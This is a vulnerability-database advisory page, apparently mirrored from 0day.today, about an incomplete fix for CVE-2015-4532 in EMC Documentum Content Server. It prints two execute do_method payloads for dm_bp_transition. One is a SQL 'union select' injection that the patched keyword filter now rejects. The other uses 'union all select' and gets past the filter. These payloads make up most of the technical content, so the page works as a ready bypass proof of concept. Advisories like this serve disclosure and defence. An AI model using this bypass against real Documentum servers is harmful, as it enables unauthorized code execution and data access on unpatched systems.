Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAndrey Panfilov1337DAY-ID-24075
HistoryAug 19, 2015 - 12:00 a.m.

EMC Documentum Content Server Code Execution Vulnerability

2015-08-1900:00:00
Andrey Panfilov
0day.today
43

0.003 Low

EPSS

Percentile

67.2%

JSON

EMC Documentum Content Server suffers from an arbitrary code execution vulnerability.

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see http://seclists.org/bugtraq/2015/Jul/51

New behavior introduced in CVE-2015-4532:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
        repo repo dmadmin "" 0000000000000000 0000000000000000
        0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
        from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
        0000000000000000  0000000000000000 0000000000000000 ""
        0 0 T F T T dmadmin 0000000000000000'

[DM_METHOD_E_METHOD_ARGS_INVALID]error:
     "The arguments being passed to the method 'dm_bp_transition' are 
invalid:
     arguments contain sql keywords which are not allowed."


New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
        repo repo dmadmin "" 0000000000000000 0000000000000000
        0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
        from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
        0000000000000000  0000000000000000 0000000000000000 ""
        0 0 T F T T dmadmin 0000000000000000'

__
Regards,
Andrey B. Panfilov

#  0day.today [2018-04-12]  #

Related

securityvulns 4
packetstorm 1
prion 2
cve 2
nessus 1
securityvulns
securityvulns
EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
2015-08-24 00:00:00
Privilege escalation through RPC commands in EMC Documentum Content Server (incomplete fix in CVE-2015-4532)
2015-08-24 00:00:00
ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities
2015-08-24 00:00:00
packetstorm
packetstorm
EMC Documentum Content Server Code Execution
2015-08-18 00:00:00
prion
prion
Design/Logic Flaw
2017-04-21 02:59:00
Authorization
2015-08-20 10:59:00
cve
cve
CVE-2015-4532
2015-08-20 10:59:00
CVE-2017-7220
2017-04-21 02:59:00
nessus
nessus
EMC Documentum Content Server Multiple Vulnerabilities (ESA-2015-131)
2015-08-19 00:00:00

0.003 Low

EPSS

Percentile

67.2%

JSON
Related for 1337DAY-ID-24075
securityvulns4packetstorm1prion2cve2nessus1